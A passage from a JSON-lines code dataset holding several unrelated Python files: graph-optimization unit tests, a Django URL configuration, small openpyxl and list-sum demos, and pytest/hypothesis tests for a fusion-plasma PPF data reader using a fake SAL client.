{'type': 'Placeholder', 'kind': 'op'},\n 'node_1': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_2': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_3': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_4': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_5': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_6': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'placeholder_1_data_node': {'value': None, 'kind': 'data'},\n 'placeholder_2_data_node': {'value': None, 'kind': 'data'},\n 'data_node_1': {'value': None, 'kind': 'data'},\n 'data_node_2': {'value': None, 'kind': 'data'},\n 'data_node_3': {'value': None, 'kind': 'data'},\n 'data_node_3_2': {'value': None, 'kind': 'data'},\n 'data_node_4': {'value': None, 'kind': 'data'},\n 'data_node_5': {'value': None, 'kind': 'data'},\n 'data_node_6': {'value': None, 'kind': 'data'},\n 'tf_call_1': {'type': 'TFCustomSubgraphCall', 'kind': 'op'},\n 'tf_call_2': {'type': 'TFCustomSubgraphCall', 'kind': 'op'},\n 'tf_call_3': {'type': 'TFCustomSubgraphCall', 'kind': 'op'},\n }\n\n\nclass TestEliminatePass(unittest.TestCase):\n def test_mark_output_unreachable_nodes(self):\n \"\"\"\n Checks that all nodes that are unreachable from output nodes are marked correspondingly.\n The graph doesn't contain data nodes yet.\n \"node_4\" is output.\n\n placeholder_1->node_1->node_2\n \\\n -> node_3->node_4\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n [('placeholder_1', 'node_1'),\n ('node_1', 'node_2'),\n ('placeholder_1', 'node_3'),\n ('node_3', 'node_4')],\n {'node_4': {'is_output': True}},\n nodes_with_edges_only=True)\n mark_output_reachable_nodes(graph)\n\n self.assertListEqual(sorted(['placeholder_1', 'node_3', 'node_4']),\n sorted(get_nodes_with_attributes(graph, is_output_reachable=True)))\n self.assertListEqual(sorted(['node_1', 'node_2']),\n sorted(get_nodes_with_attributes(graph, is_output_reachable=False)))\n\n def test_mark_output_unreachable_nodes_behind_output(self):\n \"\"\"\n Checks case when unreachable node is 'behind' (i.e. is the child) of the output node.\n The graph doesn't contain data nodes yet.\n \"node_2\" is output.\n\n placeholder_1->node_1->node_2->node_3\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n [('placeholder_1', 'node_1'),\n ('node_1', 'node_2'),\n ('node_2', 'node_3')],\n {'node_2': {'is_output': True}},\n nodes_with_edges_only=True)\n mark_output_reachable_nodes(graph)\n\n self.assertListEqual(sorted(['placeholder_1', 'node_1', 'node_2']),\n sorted(get_nodes_with_attributes(graph, is_output_reachable=True)))\n self.assertFalse(graph.node['node_3']['is_output_reachable'])\n\n def test_mark_ops_producing_constant_values(self):\n \"\"\"\n Checks case when operation produces only constant tensors so it could be removed. If the node produces several\n tensors and at least one of them is not constant then we should not mark this node.\n The graph contains data nodes.\n \"data_node_2\" and \"data_node_5\" are output.\n \"node_3\" produces constant tensor \"data_node_3\" and non-constant tensor \"data_node_3_2\".\n \"node_6\" produces constant tensor \"data_node_6\".\n \"node_4\" could be eliminated since it gets constant input.\n\n node_6->data_node_6->\n \\\n placeholder_1->placeholder_1_data_node->node_1->data_node_1->node_2->data_node_2\n /\n node_3->data_node_3->node_4->data_node_4->\n \\\n ->data_node_3_2->node_5->data_node_5\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n [('placeholder_1', 'placeholder_1_data_node'),\n ('placeholder_1_data_node', 'node_1'),\n ('node_1', 'data_node_1'),\n ('data_node_1', 'node_2'),\n ('node_2', 'data_node_2'),\n ('node_3', 'data_node_3'),\n ('node_3', 'data_node_3_2'),\n ('node_6', 'data_node_6'),\n ('data_node_6', 'node_1'),\n ('data_node_3_2', 'node_5'),\n ('node_5', 'data_node_5'),\n ('data_node_3', 'node_4'),\n ('data_node_4', 'node_1')],\n {'data_node_2': {'is_output': True},\n 'data_node_5': {'is_output': True},\n 'data_node_3': {'value': np.array(1)},\n 'data_node_6': {'value': np.array(1)}},\n nodes_with_edges_only=True)\n mark_const_producer_nodes(graph)\n self.assertTrue((graph.node['node_6']['is_const_producer']))\n self.assertListEqual(sorted(['node_1', 'node_2', 'node_3', 'node_5', 'placeholder_1']),\n sorted(get_nodes_with_attributes(graph, is_const_producer=False, kind='op')))\n\n graph_clean_up(graph)\n self.assertTrue('node_3' in graph.nodes())\n self.assertTrue('node_4' not in graph.nodes())\n self.assertTrue('node_6' not in graph.nodes())\n\n def test_undead_nodes_with_constant_inputs(self):\n \"\"\"\n Checks that if node of 'undead' type has constant inputs it is not removed from the graph.\n :return: None\n \"\"\"\n pass\n\n def test_remove_node_from_graph(self):\n \"\"\"\n Checks case when remove node from graph.\n The graph doesn't contain removed node yet.\n \"node_2\" should be removed.\n\n placeholder_1->node_1->node_2->node_3\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n [('placeholder_1', 'node_1'),\n ('node_1', 'node_2'),\n ('node_2', 'node_3')],\n nodes_with_edges_only=True)\n erase_node(Node(graph, 'node_2'))\n\n self.assertListEqual(sorted(['placeholder_1', 'node_1', 'node_3']), sorted(graph.nodes()))\n","repo_name":"pc2/CustoNN2","sub_path":"dldt/model-optimizer/mo/middle/passes/eliminate_test.py","file_name":"eliminate_test.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"48149214514","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('post/', post, name='post'),\n path('post_write/', post_write, name='post_write'),\n path('post_detail//', post_detail, name='post_detail'),\n path('post_delete//', post_delete, name='post_delete'),\n path('post_modify//', post_modify, name='post_modify'),\n path('comment_create/', comment_create, name='comment_create'),\n path('comment_delete/', comment_delete, name='comment_delete'),\n path('search/', search, name='search'),\n]","repo_name":"znzmektm425/zeronine-parkjisu","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27740418457","text":"import os\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n# wb = Workbook()\n# sheet = wb.active\n# sheet['A1'] = 'hello'\n# wb.save('%s/test.xlsx' % path)\n\nwb = load_workbook('test.xlsx')\nsheet = wb['Sheet']\nn = sheet['A1'].value\nprint(n)\nsheet['A1'] = 'world'\nwb.save('%s/test.xlsx' % path)","repo_name":"tahitian/python_script","sub_path":"openpyxl_demo.py","file_name":"openpyxl_demo.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43261519396","text":"list_a = [1, 2, 3, 4, 5]\n\ndef list_sum(lst):\n sum = 0\n for i in lst:\n sum = sum + i\n return sum\n\nprint(list_sum(list_a)) \n\n\n#print(sum(list_a))\n# numbers=[1,2,3,4]\n# result=0\n# for i in numbers:\n# result=result+i\n# print(result) \n","repo_name":"hyunin3/practice","sub_path":"List의 합 구하기.py","file_name":"List의 합 구하기.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3095434871","text":"\"\"\"Test reading from SAL database.\"\"\"\n\nfrom contextlib import contextmanager\nfrom contextlib import nullcontext\nimport os\nimport pathlib\nimport re\nimport tempfile\nfrom typing import Callable\nfrom typing import cast\nfrom typing import List\nfrom typing import Union\nfrom unittest.mock import DEFAULT\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nfrom hypothesis import given\nfrom hypothesis import settings\nfrom hypothesis.extra.numpy import arrays\nfrom hypothesis.strategies import floats\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import just\nfrom hypothesis.strategies import lists\nfrom hypothesis.strategies import sampled_from\nfrom hypothesis.strategies import text\nfrom hypothesis.strategies import tuples\nimport numpy as np\nimport pytest\nimport sal.client\nimport sal.core.exception\nimport scipy.constants as sc\n\nfrom indica.readers import PPFReader\nfrom indica.readers.ppfreader import PPFWarning\nfrom indica.readers.selectors import choose_on_plot\nfrom indica.readers.selectors import DataSelector\nfrom indica.session import global_session\nfrom indica.session import Session\nfrom .fake_salclient import BaseFakeSALClient\nfrom ..strategies import sane_floats\n\n\nFAKE_DATA_PATH = pathlib.Path(__file__).parent.absolute() / \"ppf_samples.json\" # .pkl\"\n\n\nclass JETFakeSALClient(BaseFakeSALClient):\n @property\n def data_file(self) -> Union[str, pathlib.Path]:\n return FAKE_DATA_PATH\n\n\npulses = integers(1, 99999)\ntimes = lists(floats(30.0, 80.0), min_size=2, max_size=2).map(\n cast(Callable[[List[float]], List], sorted)\n)\nerrors = floats(0.0001, 0.2)\nmax_freqs = floats(2.0, 1000.0)\nrevisions = integers(0)\nactual_revisions = integers(1)\nedited_revisions = lists(actual_revisions, min_size=1, unique=True).map(\n cast(Callable[[List[int]], List], sorted)\n)\nlines_of_sight = tuples(\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n)\n\n\ndef patched_ppf_reader(\n pulse: int,\n tstart: float,\n tend: float,\n server: str = \"FakeSAL\",\n default_error: float = 0.05,\n max_freq: float = 1e6,\n selector: DataSelector = choose_on_plot,\n session: Session = global_session,\n):\n with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(\n pulse, tstart, tend, server, default_error, max_freq, selector, session\n )\n reader._read_cached_ppf = MagicMock(return_value=None) # type: ignore\n reader._write_cached_ppf = MagicMock() # type: ignore\n return reader\n\n\ndef trim_lines_of_sight(los, n):\n \"\"\"Return a new tuple with the LOS arrays trimmed to length n.\"\"\"\n return tuple(d[:n] for d in los)\n\n\ndef get_record(reader, pulse, uid, instrument, dtype, revision):\n \"\"\"Gets the path for the requested record, with the correct revision for\n the data actually heald in the database.\"\"\"\n path = f\"/pulse/{pulse:d}/ppf/signal/{uid}/{instrument}/{dtype}\"\n rev = reader._client.list(path + f\":{revision}\").revision_current\n return path + f\":{rev}\"\n\n\n@given(pulses, times, errors, max_freqs, text(), text())\ndef test_authentication(pulse, time_range, error, freq, user, password):\n \"\"\"Test authentication method on client get called.\"\"\"\n with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n assert reader.authenticate(user, password)\n reader._client.authenticate.assert_called_once_with(user, password)\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n sampled_from([\"hrts\", \"lidr\"]),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"hrts\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_thomson_scattering(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test quantities returned by _get_thomson_scattering are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_thomson_scattering(uid, instrument, revision, quantities)\n if bad_rev:\n return\n z_signal = reader._client.construct_signal(f\"{instrument}/z\")\n assert np.all(z_signal.data == results[\"z\"])\n assert len(z_signal.data) == results[\"length\"]\n assert np.all(z_signal.dimensions[0].data == results[\"R\"])\n records = [get_record(reader, pulse, uid, instrument, \"z\", revision)]\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q] == signal.data)\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n if instrument == \"lidr\":\n error_signal = reader._client.construct_signal(f\"{instrument}/{q}u\")\n np.testing.assert_allclose(\n results[q] + results[q + \"_error\"], error_signal.data\n )\n else:\n error_signal = reader._client.construct_signal(f\"{instrument}/d{q}\")\n np.testing.assert_allclose(results[q + \"_error\"], error_signal.data)\n assert np.all(results[\"times\"] == error_signal.dimensions[0].data)\n expected = sorted(\n records\n + list(\n map(\n lambda x: get_record(reader, pulse, uid, instrument, x, revision),\n [q, q + \"u\" if instrument == \"lidr\" else \"d\" + q],\n )\n )\n )\n assert sorted(results[q + \"_records\"]) == expected\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"cgiroud\"),\n sampled_from(\n [key for key in PPFReader.INSTRUMENT_METHODS.keys() if \"cx\" in key.lower()[:2]]\n ),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"cxg6\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_charge_exchange(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test quantities returned by _get_charge_exchange are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_charge_exchange(uid, instrument, revision, quantities)\n if bad_rev:\n return\n z_signal = reader._client.construct_signal(f\"{instrument}/pos\")\n assert np.all(z_signal.data[0, :] == results[\"z\"])\n assert len(z_signal.data[0, :]) == results[\"length\"]\n assert np.all(\n reader._client.construct_signal(f\"{instrument}/rpos\").data[0, :] == results[\"R\"]\n )\n assert np.all(\n reader._client.construct_signal(f\"{instrument}/texp\").data == results[\"texp\"]\n )\n assert isinstance(results[\"element\"], str)\n records = [\n get_record(reader, pulse, uid, instrument, q, revision)\n for q in [\"pos\", \"rpos\", \"texp\", \"mass\"]\n ]\n uncertainties = {\"angf\": \"afhi\", \"conc\": \"cohi\", \"ti\": \"tihi\"}\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q] == signal.data)\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n error_signal = reader._client.construct_signal(\n f\"{instrument}/{uncertainties[q]}\"\n )\n np.testing.assert_allclose(\n results[q + \"_error\"] + results[q], error_signal.data\n )\n assert np.all(results[\"times\"] == error_signal.dimensions[0].data)\n assert sorted(results[q + \"_records\"]) == sorted(\n records\n + [\n get_record(reader, pulse, uid, instrument, x, revision)\n for x in [q, uncertainties[q]]\n ]\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n sampled_from([\"efit\", \"eftp\"]),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"efit\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_equilibrium(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test quantities returned by _get_equilibrium are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_equilibrium(uid, instrument, revision, quantities)\n if bad_rev:\n return\n signal = reader._client.construct_signal(f\"{instrument}/f\")\n if len({\"f\", \"ftor\", \"vjac\", \"rmji\", \"rmjo\"} & quantities) > 0:\n assert np.all(signal.dimensions[1].data == results[\"psin\"])\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q].flatten() == signal.data.flatten())\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n if q == \"psi\":\n assert sorted(results[q + \"_records\"]) == sorted(\n map(\n lambda x: get_record(reader, pulse, uid, instrument, x, revision),\n [\"psi\", \"psir\", \"psiz\"],\n )\n )\n else:\n assert results[q + \"_records\"] == [\n get_record(reader, pulse, uid, instrument, q, revision)\n ]\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"kk3\"),\n just({\"te\"}),\n revisions,\n edited_revisions,\n sane_floats(),\n)\n@settings(deadline=2000)\ndef test_get_cyclotron_emissions(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n quantities,\n revision,\n available_revisions,\n z,\n):\n \"\"\"Test quantities returned by _get_cyclotrons_emissions are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n mock_surf = MagicMock(\n return_value=(\n np.array([0]),\n np.array([0]),\n np.array([z]),\n np.array([z]),\n np.array([0]),\n np.array([0]),\n )\n )\n with patch(\"indica.readers.surf_los.read_surf_los\", mock_surf), pytest.raises(\n sal.core.exception.NodeNotFound\n ) if bad_rev else nullcontext():\n results = reader._get_cyclotron_emissions(uid, instrument, revision, quantities)\n if bad_rev:\n return\n assert results[\"z\"] == z\n # TODO: determine how best to describe the SURF data for PROV\n records = [\n \"surf_los.dat\",\n get_record(reader, pulse, uid, instrument, \"gen\", revision),\n ]\n assert results[\"machine_dims\"] == ((1.83, 3.9), (-1.75, 2.0))\n gen = reader._client.construct_signal(f\"{instrument}/gen\")\n for q in quantities:\n vals = results[q]\n channel_names = [\n f\"{q}{chan + 1:02d}\" for chan, v in enumerate(gen.data[0, :]) if v > 0.0\n ]\n channel_indices = [int(c[-2:]) - 1 for c in channel_names]\n for i, name in enumerate(channel_names):\n assert np.all(\n vals[:, i]\n == reader._client.construct_signal(f\"{instrument}/{name}\").data\n )\n assert results[\"Btot\"] * sc.e * gen.data[11, channel_indices] / (\n 2 * np.pi * sc.m_e\n ) == pytest.approx(gen.data[15, channel_indices] * 1e9)\n assert np.all(results[q + \"_error\"] == pytest.approx(error * vals))\n bad_channels = np.argwhere(np.isin(results[\"Btot\"], results[\"bad_channels\"]))\n assert np.all(gen.data[18, bad_channels] == 0)\n assert np.all(gen.data[19, bad_channels] == 0)\n assert np.all(np.delete(gen.data[18, :], bad_channels) != 0)\n assert np.all(np.delete(gen.data[19, :], bad_channels) != 0)\n assert sorted(results[q + \"_records\"]) == sorted(\n records\n + [\n get_record(reader, pulse, uid, instrument, x, revision)\n for x in channel_names\n ]\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"sxr\"),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"sxr\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n lines_of_sight,\n)\ndef test_get_sxr(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n los,\n):\n \"\"\"Test SXR quantities returned by _get_radiation are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n LOS_LENS = {\"sxr/h\": 17, \"sxr/t\": 35, \"sxr/v\": 35}\n mock_surf = MagicMock(\n side_effect=lambda f, p, inst: trim_lines_of_sight(los, LOS_LENS[inst])\n )\n with patch(\"indica.readers.surf_los.read_surf_los\", mock_surf), pytest.raises(\n sal.core.exception.NodeNotFound\n ) if bad_rev else nullcontext():\n results = reader._get_radiation(uid, instrument, revision, quantities)\n\n if bad_rev:\n return\n\n assert results[\"machine_dims\"] == ((1.83, 3.9), (-1.75, 2.0))\n # TODO: determine how best to describe the SURF data for PROV\n records = [\"surf_los.dat\"]\n for q in quantities:\n radiation = results[q]\n assert results[\"length\"][q] == radiation.shape[1]\n channel_names = [\n key.split(\"/\")[-1]\n for key in reader._client.data_specs\n if re.search(rf\"{q}\\d\\d$\", key, re.I)\n ]\n channel_indices = [int(c[-2:]) - 1 for c in channel_names]\n for i, name in enumerate(channel_names):\n signal = reader._client.construct_signal(f\"{instrument}/{name}\")\n assert np.all(radiation[:, i] == signal.data)\n assert np.all(results[q + \"_times\"] == signal.dimensions[0].data)\n assert np.all(results[q + \"_xstart\"] == los[0][channel_indices])\n assert np.all(results[q + \"_xstop\"] == los[1][channel_indices])\n assert np.all(results[q + \"_zstart\"] == los[2][channel_indices])\n assert np.all(results[q + \"_zstop\"] == los[3][channel_indices])\n assert np.all(results[q + \"_error\"] == pytest.approx(error * radiation))\n assert sorted(results[q + \"_records\"]) == sorted(\n records\n + list(\n map(\n lambda x: get_record(reader, pulse, uid, instrument, x, revision),\n channel_names,\n )\n )\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"bolo\"),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"bolo\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n lines_of_sight,\n)\ndef test_get_radiation(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n los,\n):\n \"\"\"Test bolometric quantities returned by _get_radiation are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n LOS_LENS = {\"bolo/kb5v\": 32, \"bolo/kb5h\": 24}\n mock_surf = MagicMock(\n side_effect=lambda f, p, inst: trim_lines_of_sight(los, LOS_LENS[inst])\n )\n with patch(\"indica.readers.surf_los.read_surf_los\", mock_surf), pytest.raises(\n sal.core.exception.NodeNotFound\n ) if bad_rev else nullcontext():\n results = reader._get_radiation(uid, instrument, revision, quantities)\n if bad_rev:\n return\n # TODO: determine how best to describe the SURF data for PROV\n records = [\"surf_los.dat\"]\n for q in quantities:\n radiation = results[q]\n length = results[\"length\"][q]\n assert length == radiation.shape[1]\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(radiation == signal.data)\n assert np.all(results[q + \"_times\"] == signal.dimensions[0].data)\n assert np.all(results[q + \"_xstart\"] == los[0][:length])\n assert np.all(results[q + \"_xstop\"] == los[1][:length])\n assert np.all(results[q + \"_zstart\"] == los[2][:length])\n assert np.all(results[q + \"_zstop\"] == los[3][:length])\n assert np.all(results[q + \"_error\"] == pytest.approx(error * radiation))\n assert sorted(results[q + \"_records\"]) == sorted(\n records + [get_record(reader, pulse, uid, instrument, q, revision)]\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"ks3\"),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"ks3\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_bremsstrahlung_spectroscopy(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test data returned by _get_bremsstrahlung_spectroscopy is correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_bremsstrahlung_spectroscopy(\n uid, instrument, revision, quantities\n )\n if bad_rev:\n return\n assert results[\"machine_dims\"] == ((1.83, 3.9), (-1.75, 2.0))\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q] == signal.data)\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n # error_signal = reader._client.construct_signal(\n # f\"{instrument}/{q[0]}{q[-1]}hi\"\n # )\n # TODO: Figure out what the correct error is supposed to be\n assert np.all(results[q + \"_error\"] == 0.0)\n # assert np.all(results[\"times\"] == error_signal.dimensions[0].data)\n los = reader._client.construct_signal(f\"edg7/los{q[-1]}\")\n assert results[q + \"_xstart\"].shape == (1,)\n assert results[q + \"_xstop\"].shape == (1,)\n assert results[q + \"_zstart\"].shape == (1,)\n assert results[q + \"_zstop\"].shape == (1,)\n assert results[\"length\"][q] == 1\n assert np.all(results[q + \"_xstart\"] == los.data[1] / 1000)\n assert np.all(results[q + \"_xstop\"] == los.data[4] / 1000)\n assert np.all(results[q + \"_zstart\"] == los.data[2] / 1000)\n assert np.all(results[q + \"_zstop\"] == los.data[5] / 1000)\n assert np.all(results[q + \"_ystart\"] == np.zeros_like(los.data[1]))\n assert np.all(results[q + \"_ystop\"] == np.zeros_like(los.data[1]))\n assert sorted(results[q + \"_records\"]) == sorted(\n map(\n lambda x: get_record(reader, pulse, uid, x[0], x[1], revision),\n [\n (\"edg7\", f\"los{q[-1]}\"),\n (instrument, q),\n # (instrument, f\"{q[0]}{q[-1]}hi\"),\n ],\n )\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n text(min_size=1),\n sampled_from(sorted(PPFReader.INSTRUMENT_METHODS.keys())),\n revisions,\n lists(text(), min_size=1, unique=True).map(set),\n)\ndef test_general_get(\n pulse, time_range, error, freq, uid, instrument, revision, quantities\n):\n \"\"\"Test the generic get method to ensure it calls the correct things.\"\"\"\n with patch.multiple(\n \"indica.readers.PPFReader\",\n get_thomson_scattering=DEFAULT,\n get_charge_exchange=DEFAULT,\n get_equilibrium=DEFAULT,\n get_cyclotron_emissions=DEFAULT,\n get_radiation=DEFAULT,\n get_bremsstrahlung_spectroscopy=DEFAULT,\n ), patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n results = reader.get(uid, instrument, revision, quantities)\n assert isinstance(results, MagicMock)\n getattr(reader, reader.INSTRUMENT_METHODS[instrument]).assert_called_once_with(\n uid, instrument, revision, quantities\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n sampled_from(sorted(PPFReader.INSTRUMENT_METHODS.keys())),\n integers(),\n edited_revisions,\n)\ndef test_get_revision(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n):\n \"\"\"Test SAL provenance is being correctly saved in create_provenance.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n )\n reader._client._revisions = available_revisions\n if revision < 0:\n with pytest.raises(sal.core.exception.InvalidPath):\n reader._get_revision(uid=uid, instrument=instrument, revision=revision)\n elif 0 < revision < available_revisions[0]:\n with pytest.raises(sal.core.exception.NodeNotFound):\n reader._get_revision(uid=uid, instrument=instrument, revision=revision)\n else:\n expected_revision = reader._client.list(\n f\"/pulse/{reader.pulse:d}/ppf/signal/{uid}/{instrument}:{revision:d}\"\n ).revision_current\n assert (\n reader._get_revision(uid=uid, instrument=instrument, revision=revision)\n == expected_revision\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n sampled_from([\"bolo\", \"efit\", \"lidr\", \"eftp\", \"cxg6\"]),\n revisions,\n)\ndef test_cache_read_write(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n):\n \"\"\"Test that reading a cache produces the same data that was written to it.\"\"\"\n with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n quantity = sorted(reader.available_quantities(instrument).keys())[0]\n with tempfile.TemporaryDirectory() as tmpdir:\n salpath = reader.get_sal_path(uid, instrument, quantity, revision)\n path = pathlib.Path(tmpdir) / reader._sal_path_to_file(salpath).name\n data = reader._client.get(salpath)\n reader._write_cached_ppf(path, data)\n data2 = reader._read_cached_ppf(path)\n np.testing.assert_equal(data.data, data2.data)\n\n\n@contextmanager\ndef cachedir():\n \"\"\"Set up a fake cache directory for testing getting of channels to\n drop.\n\n \"\"\"\n import indica.readers.ppfreader as ppfreader\n\n old_cache = ppfreader.CACHE_DIR\n userdir = os.path.expanduser(\"~\")\n with tempfile.TemporaryDirectory(dir=userdir) as new_cache:\n ppfreader.CACHE_DIR = os.path.relpath(new_cache, userdir)\n try:\n yield ppfreader.CACHE_DIR\n finally:\n ppfreader.CACHE_DIR = old_cache\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n sampled_from([\"bolo\", \"efit\", \"lidr\", \"eftp\", \"cxg6\"]),\n revisions,\n)\ndef test_get_signal_from_cache(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n):\n \"\"\"Test that reading a cache produces the same data that was written to it.\"\"\"\n with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n quantity = 